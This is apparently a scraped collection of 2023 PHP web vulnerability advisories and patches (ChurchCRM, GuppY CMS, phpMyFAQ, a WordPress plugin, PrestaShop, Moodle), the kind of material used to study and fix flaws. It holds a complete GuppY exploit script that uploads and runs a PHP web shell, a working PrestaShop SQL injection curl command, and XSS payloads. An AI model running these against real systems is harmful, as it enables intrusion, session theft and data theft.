ChurchCRM v4.5.4 is vulnerable to Reflected Cross-Site Scripting (XSS) via image file.

**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**

**On what page in the application did you find this issue?**

I got issue CSVImport.php page.

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Windows Server

**What browser (and version) are you running?**

Brave browser \[Version 1.50.119 Chromium: 112.0.5615.121\]

**What version of PHP is the server running?**

7.4.29

**What version of SQL Server are you running?**

Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29

**What version of ChurchCRM are you running?**

v4.5.4

**Description:**  
I found Cross site scripting (XSS) vulnerability in your ChurchCRM (v4.5.4) "Admin" menu to CSV Import page there Import data CSV uploader option. When I upload image file there malicious code inserted in image then the browser give me result. Because a browser can not know if the script should be trusted or not.

**CMS Version:**  
v4.5.4

**Affected URL:**  
http://127.0.0.1/churchcrm/CSVImport.php

**Steps to Reproduce:**

1.  First login your admin panel.
2.  Then click "Admin" menu and click "CSV Import" and you will get CSV file uploder option.

3.  now insert xss payload in jpg file using exiftool or from image properties.

4.  after then upload the jpg file.
5.  you will see XSS pop up.

**Proof of Concept:**  
You can see the Proof of Concept. Which I've attached screenshots and video to confirm the vulnerability.

poc.mp4

**Impact:**  
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards  
**Rahad Chowdhury**  
Cyber Security Specialist  
https://www.linkedin.com/in/rahadchowdhury/

CVE-2023-31699: XSS via Image File · Issue #6471 · ChurchCRM/CRM

GuppY CMS 6.00.10 is vulnerable to Unrestricted File Upload which allows remote attackers to execute arbitrary code by uploading a php file.

**GuppY CMS v6.00.10 - Remote Code Execution**

**Platform:****PHP**

**Date:****2023-03-25**

  

    # Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
    # Date: Sep 30, 2022
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.freeguppy.org/
    # Software Link:
    https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
    # Version: 6.00.10
    # Tested on: Linux
    
    #!/usr/bin/php
    
    <?php
    
    $username = "Admin2"; //Administrator username
    $password = "rose1337"; //Administrator password
    
    
    $options = getopt('u:c:');
    
    if(!isset($options['u'], $options['c']))
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
    \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
    
    \n");
    
    $target     =  $options['u'];
    
    $command    =  $options['c'];
    
    // Administrator login
    
    $cookie="cookie.txt";
    $url = "{$target}guppy/connect.php";
    
    $postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
    $curlObj = curl_init();
    
    curl_setopt($curlObj, CURLOPT_URL, $url);
    curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlObj, CURLOPT_HEADER, 1);
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
    curl_setopt ($curlObj, CURLOPT_POST, 1);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
    CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
    CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
    curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
    curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
    $result = curl_exec($curlObj);
    
    
    // uploading shell
    
    $url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
    
    $post='------WebKitFormBoundarygA1APFcUlkIaWal4
    Content-Disposition: form-data; name="rep"
    
    file
    ------WebKitFormBoundarygA1APFcUlkIaWal4
    Content-Disposition: form-data; name="ficup"; filename="shell.php"
    Content-Type: application/x-php
    
    <?php system($_GET["cmd"]); ?>
    
    ------WebKitFormBoundarygA1APFcUlkIaWal4--
    ';
    
    $headers = array(
    
    
                'Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
                'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
    
                'Accept-Encoding: gzip, deflate',
                'Accept-Language: en-US,en;q=0.9'
    );
    curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($curlObj, CURLOPT_URL, $url2);
    curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
    curl_setopt($curlObj, CURLOPT_POST, true);
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
    CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
    CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
    curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
    curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
    
    $data = curl_exec($curlObj);
    
    
    // Executing the shell
    
    
    $shell = "{$target}guppy/file/shell.php?cmd=" .$command;
    curl_setopt($curlObj, CURLOPT_URL, $shell);
    curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:
    application/x-www-form-urlencoded'));
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    curl_setopt($curlObj, CURLOPT_HEADER, False);
    curl_setopt($curlObj, CURLOPT_POST, false);
    
    $exec_shell = curl_exec($curlObj);
    
    $code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
    
    if($code != 200) {
        echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the
    credentials\n";
    }
    else {
    
    print("\n");
    print($exec_shell);
    
    }
    curl_close($curlObj);
    
    ?>

CVE-2023-31903: OffSec’s Exploit Database Archive

Cross-site Scripting (XSS) - Stored in GitHub repository thorsten/phpmyfaq prior to 3.2.0-beta.

**phpMyFAQ vulnerable to stored Cross-site Scripting**

High severity GitHub Reviewed Published May 17, 2023 to the GitHub Advisory Database • Updated May 17, 2023

GHSA-j657-pjgc-c4h6: phpMyFAQ vulnerable to stored Cross-site Scripting

GHSA-vppq-6ff8-2m8w: phpMyFAQ vulnerable to stored Cross-site Scripting

CVE-2023-2752: huntr – Security Bounties for any GitHub repository

Expand Up

@@ -18,6 +18,7 @@

namespace phpMyFAQ\\Helper;

  

use DOMDocument;

use DOMXPath;

use Exception;

use ParsedownExtra;

use phpMyFAQ\\Category;

Expand Down Expand Up

@@ -245,6 +246,14 @@ public function cleanUpContent(string $content): string

$scriptTags\->item($i)->parentNode\->removeChild($scriptTags\->item($i));

}

  

return preg\_replace(\['/\\r/', '/\\n/'\], '', $document\->saveHTML());

$xpath = new DOMXPath($document);

$onAttributes = $xpath\->query("//\*/@\*\[starts-with(name(), 'on')\]");

foreach ($onAttributes as $onAttribute) {

$onAttribute\->ownerElement\->removeAttributeNode($onAttribute);

}

  

$body = $xpath\->query('body')->item(0);

  

return preg\_replace(\['/\\r/', '/\\n/'\], '', $document\->saveHTML($body));

}

}

CVE-2023-2753: fix: remove HTML event attributes · thorsten/phpMyFAQ@5401ab7

The Multiple Page Generator Plugin for WordPress is vulnerable to Cross-Site Request Forgery leading to time-based SQL Injection via the orderby and order parameters in versions up to, and including, 3.3.17 due to missing nonce verification on the projects_list function and insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries leading to resource exhaustion via a forged request granted they can trick an administrator into performing an action such as clicking on a link. Version 3.3.18 addresses the SQL Injection, which drastically reduced the severity.

Location:

multiple-pages-generator-by-porthas/trunk

Files:

  

*   controllers/CoreController.php (4 diffs)
*   controllers/ProjectsListManage.php (2 diffs)
*   controllers/SearchController.php (1 diff)
*   frontend/js/components/page-builder.js (2 diffs)
*   frontend/js/components/spintax.js (2 diffs)
*   porthas-multi-pages-generator.php (1 diff)
*   readme.txt (1 diff)
*   vendor/autoload.php (1 diff)
*   vendor/composer/autoload\_real.php (2 diffs)
*   vendor/composer/autoload\_static.php (2 diffs)
*   vendor/composer/installed.php (2 diffs)
*   views/project-builder/main/index.php (2 diffs)
*   views/project-builder/spintax/index.php (1 diff)
*   views/projects-list/projects.php (1 diff)

**Legend:**

Unmodified

Added

Removed

*   **multiple-pages-generator-by-porthas/trunk/controllers/CoreController.php**
    
    r2905353
    
    r2910686
    
     
    
    248
    
    248
    
                $atts = array\_change\_key\_case((array) $atts, CASE\_LOWER);
    
    249
    
    249
    
    250
    
     
    
                if (isset($atts\['limit'\])) {
    
     
    
    250
    
                if ( isset( $atts\['limit'\] ) ) {
    
    251
    
    251
    
                    // фикс из-за того, что человек пишет лимит = 2, а получает 3 результата, ведь отсчет в массивах начинается с 0
    
    252
    
    252
    
                    $atts\['limit'\] = (int) $atts\['limit'\] - 1;
    
    …
    
    …
    
     
    
    451
    
    451
    
                        }
    
    452
    
    452
    
    453
    
     
    
                        if ($limit && count($shortcode\_response\_data) > $limit) {
    
     
    
    453
    
                        if ( ! is\_null( $limit ) && count( $shortcode\_response\_data ) > $limit ) {
    
    454
    
    454
    
                            break;
    
    455
    
    455
    
                        }
    
    …
    
    …
    
     
    
    640
    
    640
    
                        }
    
    641
    
    641
    
    642
    
     
    
                        if (count($shortcode\_response\_data) > $limit) {
    
     
    
    642
    
                        if ( ! is\_null( $limit ) && count( $shortcode\_response\_data ) > $limit ) {
    
    643
    
    643
    
                            break;
    
    644
    
    644
    
                        }
    
    …
    
    …
    
     
    
    693
    
    693
    
    694
    
    694
    
    695
    
     
    
                        if (count($shortcode\_response\_data) > $limit) {
    
     
    
    695
    
                        if ( ! is\_null( $limit ) && count( $shortcode\_response\_data ) > $limit ) {
    
    696
    
    696
    
                            break;
    
    697
    
    697
    
                        }
    
*   **multiple-pages-generator-by-porthas/trunk/controllers/ProjectsListManage.php**
    
    r2905353
    
    r2910686
    
     
    
    27
    
    27
    
                $where = '';
    
    28
    
    28
    
                if ( ! empty( $search ) ) {
    
     
    
    29
    
                    $search = $wpdb::esc\_like( $search );
    
    29
    
    30
    
                    $where .= " WHERE name LIKE '%$search%'";
    
    30
    
    31
    
                }
    
    …
    
    …
    
     
    
    32
    
    33
    
                $orderby = 'ORDER BY name DESC';
    
    33
    
    34
    
                if ( ! empty( $\_GET\['orderby'\] ) && ! empty( $\_GET\['order'\] ) ) {
    
    34
    
     
    
                    $orderby = sanitize\_text\_field( wp\_unslash( $\_GET\['orderby'\] ) );
    
    35
    
     
    
                    $order   = strtoupper( sanitize\_text\_field( wp\_unslash( $\_GET\['order'\] ) ) );
    
    36
    
     
    
                    $orderby = "ORDER by $orderby $order";
    
     
    
    35
    
                    $get\_orderby = sanitize\_text\_field( wp\_unslash( $\_GET\['orderby'\] ) );
    
     
    
    36
    
                    $order       = strtoupper( sanitize\_text\_field( wp\_unslash( $\_GET\['order'\] ) ) );
    
     
    
    37
    
                    if ( in\_array( $get\_orderby, array( 'name', 'created\_at' ), true ) && in\_array( $order, array( 'DESC', 'ASC' ), true ) ) {
    
     
    
    38
    
                        $orderby = "ORDER by $get\_orderby $order";
    
     
    
    39
    
                    }
    
    37
    
    40
    
                }
    
    38
    
     
    
                $where        .= " $orderby LIMIT $per\_page OFFSET $paged";
    
    39
    
     
    
                $table\_name    = $wpdb->prefix . MPG\_Constant::MPG\_PROJECTS\_TABLE;
    
    40
    
     
    
                $retrieve\_data = $wpdb->get\_results( "SELECT \* FROM $table\_name" . $where ); // phpcs:ignore
    
     
    
    41
    
                $where     .= sprintf( ' %s LIMIT %d OFFSET %d', $orderby, $per\_page, $paged );
    
     
    
    42
    
                $table\_name = $wpdb->prefix . MPG\_Constant::MPG\_PROJECTS\_TABLE;
    
     
    
    43
    
                // phpcs:ignore WordPress.DB.PreparedSQL.InterpolatedNotPrepared, WordPress.DB.PreparedSQL.NotPrepared, WordPress.DB.DirectDatabaseQuery
    
     
    
    44
    
                $retrieve\_data = $wpdb->get\_results( "SELECT \* FROM $table\_name" . $where );
    
    41
    
    45
    
                return $retrieve\_data;
    
    42
    
    46
    
            }
    
*   **multiple-pages-generator-by-porthas/trunk/controllers/SearchController.php**
    
    r2905353
    
    r2910686
    
     
    
    154
    
    154
    
                $limit          = isset($args\['limit'\]) ? (int) $args\['limit'\] : 10;
    
    155
    
    155
    
                $base\_url       = isset($atts\['base-url'\]) ? (string) $atts\['base-url'\]  : MPG\_Helper::mpg\_get\_base\_url(true);
    
    156
    
     
    
                $case\_sensitive = isset($args\['case\_sensitive'\]) ?? $args\['case\_sensitive'\] === '1';
    
     
    
    156
    
                $case\_sensitive = isset( $args\['case\_sensitive'\] ) && $args\['case\_sensitive'\] === '1' ? true : false;
    
    157
    
    157
    
    158
    
    158
    
*   **multiple-pages-generator-by-porthas/trunk/frontend/js/components/page-builder.js**
    
    r2905353
    
    r2910686
    
     
    
    197
    
    197
    
        }
    
    198
    
    198
    
     
    
    199
    
        jQuery( this ).next('span.spinner').addClass( 'is-active' );
    
     
    
    200
    
        jQuery( this ).attr( 'disabled', true );
    
    199
    
    201
    
    200
    
    202
    
        let dataObject = {
    
    …
    
    …
    
     
    
    467
    
    469
    
        const templateId = jQuery('#mpg\_set\_template\_dropdown').val();
    
    468
    
    470
    
        const applyCondition = jQuery('#mpg\_apply\_condition').val();
    
    469
    
     
    
     
    
    471
    
        const submitButton = jQuery( this ).find( 'button' );
    
     
    
    472
    
        submitButton.next('span.spinner').addClass( 'is-active' );
    
     
    
    473
    
        submitButton.attr( 'disabled', true );
    
    470
    
    474
    
        let response = await jQuery.post(ajaxurl, {
    
    471
    
    475
    
            action: 'mpg\_upsert\_project\_main',
    
*   **multiple-pages-generator-by-porthas/trunk/frontend/js/components/spintax.js**
    
    r2905353
    
    r2910686
    
     
    
    9
    
    9
    
    10
    
    10
    
        const spintaxString = inputTextarea.val();
    
     
    
    11
    
     
    
    12
    
        jQuery( this ).next('span.spinner').addClass( 'is-active' );
    
     
    
    13
    
        jQuery( this ).attr( 'disabled', true );
    
    11
    
    14
    
    12
    
    15
    
        const spintaxRawResponse = await jQuery.post(ajaxurl, {
    
    …
    
    …
    
     
    
    23
    
    26
    
            outputTextarea.html(spintaxResponse.data);
    
    24
    
    27
    
        }
    
     
    
    28
    
        jQuery( this ).next('span.spinner').removeClass( 'is-active' );
    
     
    
    29
    
        jQuery( this ).removeAttr( 'disabled' );
    
    25
    
    30
    
    });
    
    26
    
    31
    
*   **multiple-pages-generator-by-porthas/trunk/porthas-multi-pages-generator.php**
    
    r2905353
    
    r2910686
    
     
    
    9
    
    9
    
     \* Author: Themeisle
    
    10
    
    10
    
     \* Author URI: https://themeisle.com
    
    11
    
     
    
     \* Version: 3.3.17
    
     
    
    11
    
     \* Version: 3.3.18
    
    12
    
    12
    
     \*/
    
    13
    
    13
    
    if ( ! defined( 'ABSPATH' ) ) {
    
*   **multiple-pages-generator-by-porthas/trunk/readme.txt**
    
    r2905353
    
    r2910686
    
     
    
    201
    
    201
    
    202
    
    202
    
    \== Changelog ==
    
     
    
    203
    
     
    
    204
    
    #####   Version 3.3.18 (2023-05-10)
    
     
    
    205
    
     
    
    206
    
    \- Fixed project data-saving issue
    
     
    
    207
    
    \- Fixed shortcode limit attribute issue
    
     
    
    208
    
    \- PHP versions compatibility
    
     
    
    209
    
    \- Enhanced security
    
     
    
    210
    
     
    
    211
    
     
    
    212
    
    203
    
    213
    
    204
    
    214
    
    #####   Version 3.3.17 (2023-04-20)
    
*   **multiple-pages-generator-by-porthas/trunk/vendor/autoload.php**
    
    r2905353
    
    r2910686
    
     
    
    23
    
    23
    
    require\_once \_\_DIR\_\_ . '/composer/autoload\_real.php';
    
    24
    
    24
    
    25
    
     
    
    return ComposerAutoloaderInit82e69c55f23ccad60a724bc03493275d::getLoader();
    
     
    
    25
    
    return ComposerAutoloaderInit8243251c19e227487d0b043ae59a733a::getLoader();
    
*   **multiple-pages-generator-by-porthas/trunk/vendor/composer/autoload\_real.php**
    
    r2905353
    
    r2910686
    
     
    
    3
    
    3
    
    // autoload\_real.php @generated by Composer
    
    4
    
    4
    
    5
    
     
    
    class ComposerAutoloaderInit82e69c55f23ccad60a724bc03493275d
    
     
    
    5
    
    class ComposerAutoloaderInit8243251c19e227487d0b043ae59a733a
    
    6
    
    6
    
    {
    
    7
    
    7
    
        private static $loader;
    
    …
    
    …
    
     
    
    23
    
    23
    
            }
    
    24
    
    24
    
    25
    
     
    
            spl\_autoload\_register(array('ComposerAutoloaderInit82e69c55f23ccad60a724bc03493275d', 'loadClassLoader'), true, true);
    
     
    
    25
    
            spl\_autoload\_register(array('ComposerAutoloaderInit8243251c19e227487d0b043ae59a733a', 'loadClassLoader'), true, true);
    
    26
    
    26
    
            self::$loader = $loader = new \\Composer\\Autoload\\ClassLoader(\\dirname(\_\_DIR\_\_));
    
    27
    
     
    
            spl\_autoload\_unregister(array('ComposerAutoloaderInit82e69c55f23ccad60a724bc03493275d', 'loadClassLoader'));
    
     
    
    27
    
            spl\_autoload\_unregister(array('ComposerAutoloaderInit8243251c19e227487d0b043ae59a733a', 'loadClassLoader'));
    
    28
    
    28
    
    29
    
    29
    
            require \_\_DIR\_\_ . '/autoload\_static.php';
    
    30
    
     
    
            call\_user\_func(\\Composer\\Autoload\\ComposerStaticInit82e69c55f23ccad60a724bc03493275d::getInitializer($loader));
    
     
    
    30
    
            call\_user\_func(\\Composer\\Autoload\\ComposerStaticInit8243251c19e227487d0b043ae59a733a::getInitializer($loader));
    
    31
    
    31
    
    32
    
    32
    
            $loader->register(true);
    
    33
    
    33
    
    34
    
     
    
            $filesToLoad = \\Composer\\Autoload\\ComposerStaticInit82e69c55f23ccad60a724bc03493275d::$files;
    
     
    
    34
    
            $filesToLoad = \\Composer\\Autoload\\ComposerStaticInit8243251c19e227487d0b043ae59a733a::$files;
    
    35
    
    35
    
            $requireFile = \\Closure::bind(static function ($fileIdentifier, $file) {
    
    36
    
    36
    
                if (empty($GLOBALS\['\_\_composer\_autoload\_files'\]\[$fileIdentifier\])) {
    
*   **multiple-pages-generator-by-porthas/trunk/vendor/composer/autoload\_static.php**
    
    r2905353
    
    r2910686
    
     
    
    5
    
    5
    
    namespace Composer\\Autoload;
    
    6
    
    6
    
    7
    
     
    
    class ComposerStaticInit82e69c55f23ccad60a724bc03493275d
    
     
    
    7
    
    class ComposerStaticInit8243251c19e227487d0b043ae59a733a
    
    8
    
    8
    
    {
    
    9
    
    9
    
        public static $files = array (
    
    …
    
    …
    
     
    
    18
    
    18
    
        {
    
    19
    
    19
    
            return \\Closure::bind(function () use ($loader) {
    
    20
    
     
    
                $loader->classMap = ComposerStaticInit82e69c55f23ccad60a724bc03493275d::$classMap;
    
     
    
    20
    
                $loader->classMap = ComposerStaticInit8243251c19e227487d0b043ae59a733a::$classMap;
    
    21
    
    21
    
    22
    
    22
    
            }, null, ClassLoader::class);
    
*   **multiple-pages-generator-by-porthas/trunk/vendor/composer/installed.php**
    
    r2905353
    
    r2910686
    
     
    
    2
    
    2
    
        'root' => array(
    
    3
    
    3
    
            'name' => 'codeinwp/multi-pages-plugin',
    
    4
    
     
    
            'pretty\_version' => 'v3.3.17',
    
    5
    
     
    
            'version' => '3.3.17.0',
    
    6
    
     
    
            'reference' => '158f7152ad369b234b6c74bb0690f54bbbe282ad',
    
     
    
    4
    
            'pretty\_version' => 'v3.3.18',
    
     
    
    5
    
            'version' => '3.3.18.0',
    
     
    
    6
    
            'reference' => 'c8e30e0cf51f6894d26a8b4730240887cf69753e',
    
    7
    
    7
    
            'type' => 'wordpress-plugin',
    
    8
    
    8
    
            'install\_path' => \_\_DIR\_\_ . '/../../',
    
    …
    
    …
    
     
    
    12
    
    12
    
        'versions' => array(
    
    13
    
    13
    
            'codeinwp/multi-pages-plugin' => array(
    
    14
    
     
    
                'pretty\_version' => 'v3.3.17',
    
    15
    
     
    
                'version' => '3.3.17.0',
    
    16
    
     
    
                'reference' => '158f7152ad369b234b6c74bb0690f54bbbe282ad',
    
     
    
    14
    
                'pretty\_version' => 'v3.3.18',
    
     
    
    15
    
                'version' => '3.3.18.0',
    
     
    
    16
    
                'reference' => 'c8e30e0cf51f6894d26a8b4730240887cf69753e',
    
    17
    
    17
    
                'type' => 'wordpress-plugin',
    
    18
    
    18
    
                'install\_path' => \_\_DIR\_\_ . '/../../',
    
*   **multiple-pages-generator-by-porthas/trunk/views/project-builder/main/index.php**
    
    r2905353
    
    r2910686
    
     
    
    88
    
    88
    
                                    <div class="save-changes-block" style="border-bottom: 1px solid silver;">
    
    89
    
    89
    
                                        <button type="submit" class=" blue-gradient-btn btn btn-primary"><?php \_e('Save changes', 'mpg'); ?></button>
    
     
    
    90
    
                                        <span class="spinner"></span>
    
    90
    
    91
    
                                    </div>
    
    91
    
    92
    
    …
    
    …
    
     
    
    362
    
    363
    
                                <div class="save-changes-block">
    
    363
    
    364
    
                                    <button class="save-changes btn btn-primary"><?php \_e('Save changes', 'mpg'); ?></button>
    
     
    
    365
    
                                    <span class="spinner"></span>
    
    364
    
    366
    
                                </div>
    
    365
    
    367
    
*   **multiple-pages-generator-by-porthas/trunk/views/project-builder/spintax/index.php**
    
    r2905353
    
    r2910686
    
     
    
    13
    
    13
    
                 </div>
    
    14
    
    14
    
                 <div class="save-changes-block">
    
    15
    
     
    
                     <input type="button" id="mpg\_spin" class="btn btn-primary" value="<?php \_e('Spin!', 'mpg'); ?>" />
    
     
    
    15
    
                     <div class="mpg-spin-btn">
    
     
    
    16
    
                         <input type="button" id="mpg\_spin" class="btn btn-primary" value="<?php \_e('Spin!', 'mpg'); ?>" />
    
     
    
    17
    
                        <span class="spinner"></span>
    
     
    
    18
    
                     </div>
    
    16
    
    19
    
    17
    
    20
    
                     <input type="button" class="copy-spintax-output btn btn-outline-primary" value="<?php \_e('Copy expression', 'mpg'); ?>" />
    
*   **multiple-pages-generator-by-porthas/trunk/views/projects-list/projects.php**
    
    r2905353
    
    r2910686
    
     
    
    13
    
    13
    
                'page',
    
    14
    
    14
    
                'mpg-dataset-library',
    
    15
    
     
    
                admin\_url( 'admin.php' ),
    
     
    
    15
    
                admin\_url( 'admin.php' )
    
    16
    
    16
    
            );
    
    17
    
    17
    
            ?>
    

**Note:** See TracChangeset for help on using the changeset viewer.

CVE-2023-2608: Diff [2905353:2910686] for multiple-pages-generator-by-porthas/trunk – WordPress Plugin Repository

Moodle 3.10.1 is vulnerable to persistent/stored cross-site scripting (XSS) due to the improper input sanitization on the "Additional HTML Section" via "Header and Footer" parameter in `/admin/settings.php`. This vulnerability may lead an attacker to steal admin and all user account cookies by storing the malicious XSS payload in Header and Footer.

**Moodle vulnerable to stored Cross-site Scripting**

Moderate severity GitHub Reviewed Published May 16, 2023 to the GitHub Advisory Database • Updated May 17, 2023

GHSA-w2pm-fr62-jgv4: Moodle vulnerable to stored Cross-site Scripting

Prestashop posstaticblocks <= 1.0.0 is vulnerable to SQL Injection via posstaticblocks::getPosCurrentHook().

In the module “Posthemes Static Blocks” (posstaticblocks), a guest can perform SQL injection in affected versions.

Note : if ajax.php do not exists in the root module directory, you are not concerned.

**Summary**

*   **CVE ID**: CVE-2023-30189
*   **Published at**: 2023-04-27
*   **Advisory source**: Friends-Of-Presta.org
*   **Platform**: PrestaShop
*   **Product**: posstaticblocks
*   **Impacted release**: <= 1.0 (1.0.0 seems not concerned - no semver versionning)
*   **Product author**: posthemes
*   **Weakness**: CWE-89
*   **Severity**: critical (9.8)

**Description**

The method posstaticblocks::getPosCurrentHook() has sensitive SQL calls that can be executed with a trivial http call and exploited to forge a SQL injection.

The exploit can be used even if the module is not activated.

**WARNING** : This exploit is actively used to deploy webskimmer to massively stole credit cards.

**CVSS base metrics**

*   **Attack vector**: network
*   **Attack complexity**: low
*   **Privilege required**: none
*   **User interaction**: none
*   **Scope**: unchanged
*   **Confidentiality**: high
*   **Integrity**: high
*   **Availability**: high

**Vector string**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

**Possible malicious usage**

*   Obtain admin access
*   Remove data on the associated PrestaShop
*   Copy/past datas from sensibles tables to FRONT to exposed tokens and unlock admins’s ajax scripts
*   Rewrite SMTP settings to hijacked emails

**Proof of concept**

    curl -v -X POST -d 'module_id=1%22;select(0x73656C65637420736C656570283432293B)INTO@a;prepare`b`from@a;execute`b`;--' 'https://preprod.XX/modules/posstaticblocks/ajax.php'
    

**Patch from 1.0**

Version A seen :

    --- 1.0A/modules/posstaticblocks/posstaticblocks.php
    +++ XXXX/modules/posstaticblocks/posstaticblocks.php
    ...
    -$sql = 'SELECT psb.`hook_module` FROM '._DB_PREFIX_.'pos_staticblock AS psb LEFT JOIN '._DB_PREFIX_.'pos_staticblock_shop AS pss ON psb.`id_posstaticblock`= pss.`id_posstaticblock` WHERE  psb.`name_module` ="'.$name_module.'" AND pss.`id_shop` = "'.$id_shop.'"';
    +$sql = 'SELECT psb.`hook_module` FROM '._DB_PREFIX_.'pos_staticblock AS psb LEFT JOIN '._DB_PREFIX_.'pos_staticblock_shop AS pss ON psb.`id_posstaticblock`= pss.`id_posstaticblock` WHERE  psb.`name_module` ="'.pSQL($name_module).'" AND pss.`id_shop` = "'.(int)$id_shop.'"';
    

Version B seen :

    --- 1.0B/modules/posstaticblocks/posstaticblocks.php
    +++ XXXX/modules/posstaticblocks/posstaticblocks.php
    ...
    -WHERE m.`id_module` = ' . $id_module);
    +WHERE m.`id_module` = ' . (int) $id_module);
    

Be warned that there is other sensitives SQL calls inside this module accessible to administrators. Since there is thousands of injection SQL accessible to administrators on the Prestashop’s ecosystem, these vulnerabilities are ignored to avoid mind collapse.

**Other recommandations**

*   It’s recommended to apply patch given or delete the module (NB : disabled it is useless)
*   Upgrade PrestaShop to the latest version to disable multiquery executions (separated by “;”)
*   Change the default database prefix ps_ by a new longer arbitrary prefix. Nethertheless, be warned that this is useless against blackhat with DBA senior skill because of a design vulnerability in DBMS
*   Activate OWASP 942’s rules on your WAF (Web application firewall), be warned that you will probably break your backoffice and you will need to pre-configure some bypasses against these set of rules.

**Timeline**

Date

Action

2023-03-12

Issue discovered during a code review by TouchWeb

2023-03-21

Contact Author to confirm versions scope

2023-03-21

A member of Friends of Presta (FX) provide another version which need a new patch

2023-03-25

Request a CVE ID

2023-04-27

Author never answer and exploit is used to massively stole credit cards

2023-04-27

Publication of this security advisory without delay due to emergency

**Links**

*   Posthemes product page on Themes Forest
*   Posthemes website
*   National Vulnerability Database

CVE-2023-30189: [CVE-2023-30189] Improper neutralization of SQL parameter in Posthemes Static Blocks module for PrestaShop

Moodle 3.10.1 is vulnerable to persistent/stored cross-site scripting (XSS) due to the improper input sanitization on the "Additional HTML Section" via "Header and Footer" parameter in /admin/settings.php. This vulnerability is leading an attacker to steal admin and all user account cookies by storing the malicious XSS payload in Header and Footer.

**Moodle 3.10.1 - Persistent/Stored Cross-Site Scripting (XSS)****Persistent/Stored Cross-Site Scripting (XSS) Vulnerabilities found in Moodle 3.10.1 version.**

**Description:-**

Moodle 3.10.1 is vulnerable to Stored Cross-Site Scripting (XSS) due to the improper input sanitization on the "Additional HTML Section" of the /admin/settings.php page. This vulnerability could allow an attacker to inject malicious JavaScript code into the "Header" & "Footer" fields and perform Stored Cross-Site Scripting (XSS) attack into the application.

**Steps To Reproduce:-**

1.  Navigate to the http://127.0.0.1/ and login with Admin credentials.
2.  Now, navigate to the Site Administration>Appearance>Additional HTML section.
3.  Insert the following JavaScript Payload <script>alert(document.cookie)</script> into the **Header** and **Footer** fields and save the settings.
4.  Observe the Payload getting executed on all pages of the application.

**Reference: CVE-2021-27131**

Tag

#php